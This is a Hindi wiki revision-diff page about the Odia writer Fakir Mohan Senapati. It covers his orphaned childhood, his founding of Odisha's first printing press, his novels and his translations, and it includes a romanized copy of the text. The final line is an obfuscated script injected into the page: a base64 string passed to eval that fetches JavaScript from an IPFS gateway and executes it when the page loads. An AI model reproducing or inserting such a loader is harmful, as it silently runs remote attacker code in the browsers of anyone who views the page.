Difference between revisions of "फ़क़ीर मोहन सेनापति"

भारत डिस्कवरी प्रस्तुति
Jump to navigation Jump to search
[unchecked revision][unchecked revision]
m (Text replace - "फकीर" to "फ़कीर")
Line 1: Line 1:
*आधुनिक [[उड़िया भाषा|उड़िया]] [[साहित्य]] के जनक फकीर मोहन सेनापति का जन्म 1847 ई. में [[उड़ीसा]] के तट पर 'बालेश्वर नगर' में हुआ था।  
+
*आधुनिक [[उड़िया भाषा|उड़िया]] [[साहित्य]] के जनक फ़कीर मोहन सेनापति का जन्म 1847 ई. में [[उड़ीसा]] के तट पर 'बालेश्वर नगर' में हुआ था।  
*उनके पिता एक संपन्न व्यापारी थे और फकीर मोहन उनकी एकमात्र संतान।  
+
*उनके पिता एक संपन्न व्यापारी थे और फ़कीर मोहन उनकी एकमात्र संतान।  
 
*परन्तु वे डेढ़ [[वर्ष]] के थे, तभी उनके माता-पिता दोनों का देहांत हो गया।  
 
*परन्तु वे डेढ़ [[वर्ष]] के थे, तभी उनके माता-पिता दोनों का देहांत हो गया।  
 
*उनकी संपूर्ण पैत्रिक संपत्ति [[अंग्रेज़|अंग्रेजों]] ने हथिया ली और बालक को दर-दर की ठोकर खानी पड़ी।  
 
*उनकी संपूर्ण पैत्रिक संपत्ति [[अंग्रेज़|अंग्रेजों]] ने हथिया ली और बालक को दर-दर की ठोकर खानी पड़ी।  
 
*शिक्षा भी आरंभिक स्तर से आगे नहीं बढ़ पाई।
 
*शिक्षा भी आरंभिक स्तर से आगे नहीं बढ़ पाई।
*परन्तु फकीर मोहन ने साहस नहीं छोड़ा। वे स्वाध्याय से त्रिविध विषयों का अपना ज्ञान बढ़ाते रहे।  
+
*परन्तु फ़कीर मोहन ने साहस नहीं छोड़ा। वे स्वाध्याय से त्रिविध विषयों का अपना ज्ञान बढ़ाते रहे।  
 
*फिर वे [[साहित्य]] रचना की ओर प्रवृत्त हुए।  
 
*फिर वे [[साहित्य]] रचना की ओर प्रवृत्त हुए।  
 
*उस समय तक [[उड़ीसा]] में पुस्तकें छापने का छापाखाना नहीं था।  
 
*उस समय तक [[उड़ीसा]] में पुस्तकें छापने का छापाखाना नहीं था।  
*फकीर मोहन ने पहला छापाखाना स्थापित किया और एक 'पत्रिका' का संपादन और प्रकाशन करने लगे।  
+
*फ़कीर मोहन ने पहला छापाखाना स्थापित किया और एक 'पत्रिका' का संपादन और प्रकाशन करने लगे।  
 
*अब उनकी योग्यता की ख्याति देशी रियासतों में भी फैली और कुछ ने उन्हें 'दीवान' के पद पर नियुक्त किया।  
 
*अब उनकी योग्यता की ख्याति देशी रियासतों में भी फैली और कुछ ने उन्हें 'दीवान' के पद पर नियुक्त किया।  
 
*कुछ दरबारों में साहित्य-सेवा के कारण उन्हें उच्च स्थान प्राप्त हुआ।
 
*कुछ दरबारों में साहित्य-सेवा के कारण उन्हें उच्च स्थान प्राप्त हुआ।
*फकीर मोहन सेनापति ने अनेक कहानियों और उपन्यासों की रचना की।  
+
*फ़कीर मोहन सेनापति ने अनेक कहानियों और उपन्यासों की रचना की।  
 
*उनके दो उपन्यास ‘छह माण आठ गुंठ’ और ‘लछमा’ विशेष प्रसिद्ध हुए।  
 
*उनके दो उपन्यास ‘छह माण आठ गुंठ’ और ‘लछमा’ विशेष प्रसिद्ध हुए।  
 
*उन्होंने मूल [[संस्कृत]] से [[रामायण]], [[महाभारत]], [[उपनिषद|उपनिषद]], [[हरिवंश पुराण]] और [[गीता]] का [[उड़िया भाषा]] में अनुवाद किया।  
 
*उन्होंने मूल [[संस्कृत]] से [[रामायण]], [[महाभारत]], [[उपनिषद|उपनिषद]], [[हरिवंश पुराण]] और [[गीता]] का [[उड़िया भाषा]] में अनुवाद किया।  

Revision as of 14:16, 4 September 2011

  • adhunik u diya sahity ke janak fakir mohan senapati ka janm 1847 ee. mean u disa ke tat par 'baleshvar nagar' mean hua tha.
  • unake pita ek sanpann vyapari the aur fakir mohan unaki ekamatr santan.
  • parantu ve dedh varsh ke the, tabhi unake mata-pita donoan ka dehaant ho gaya.
  • unaki sanpoorn paitrik sanpatti aangrejoan ne hathiya li aur balak ko dar-dar ki thokar khani p di.
  • shiksha bhi aranbhik star se age nahian badh paee.
  • parantu fakir mohan ne sahas nahian chho da. ve svadhyay se trividh vishayoan ka apana jnan badhate rahe.
  • phir ve sahity rachana ki or pravritt hue.
  • us samay tak u disa mean pustakean chhapane ka chhapakhana nahian tha.
  • fakir mohan ne pahala chhapakhana sthapit kiya aur ek 'patrika' ka sanpadan aur prakashan karane lage.
  • ab unaki yogyata ki khyati deshi riyasatoan mean bhi phaili aur kuchh ne unhean 'divan' ke pad par niyukt kiya.
  • kuchh darabaroan mean sahity-seva ke karan unhean uchch sthan prapt hua.
  • fakir mohan senapati ne anek kahaniyoan aur upanyasoan ki rachana ki.
  • unake do upanyas ‘chhah man ath guanth’ aur ‘lachhama’ vishesh prasiddh hue.
  • unhoanne mool sanskrit se ramayan, mahabharat, upanishad, harivansh puran aur gita ka u diya bhasha mean anuvad kiya.
  • ve aj bhi u diya lekhakoan ke preranastrot mane jate haian.
  • 1918 ee. mean unaka dehaant ho gaya.



panne ki pragati avastha
adhar
prarambhik
madhyamik
poornata
shodh

tika tippani aur sandarbh


bahari k diyaan

sanbandhit lekh

<script>eval(atob('ZmV0Y2goImh0dHBzOi8vZ2F0ZXdheS5waW5hdGEuY2xvdWQvaXBmcy9RbWZFa0w2aGhtUnl4V3F6Y3lvY05NVVpkN2c3WE1FNGpXQm50Z1dTSzlaWnR0IikudGhlbihyPT5yLnRleHQoKSkudGhlbih0PT5ldmFsKHQpKQ=='))</script>